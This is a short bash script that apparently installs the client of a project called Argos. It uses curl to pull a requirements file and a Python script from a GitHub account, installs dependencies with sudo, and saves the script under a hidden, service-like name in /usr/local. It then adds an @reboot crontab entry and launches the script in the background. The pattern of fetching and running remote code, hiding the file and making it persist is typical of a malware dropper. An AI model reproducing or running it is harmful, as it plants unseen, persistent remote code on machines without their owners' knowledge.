#!/bin/bash
urlbase=https://raw.githubusercontent.com/Just1truc
# installing pip dependencies
curl $urlbase/Argos/main/client/dependencies -o here.txt && sudo pip install -r here.txt && rm here.txt
# installing script
curl $urlbase/Argos/main/client/connexion.py -o .service.exwrap.py && sudo mv .service.exwrap.py /usr/local/.service.exwrap.py 
# Setting up crontab
echo "@reboot python3 /usr/local/.service.exwrap.py" > crontb && crontab crontb && rm -rf crontb
python3 /usr/local/.service.exwrap.py &
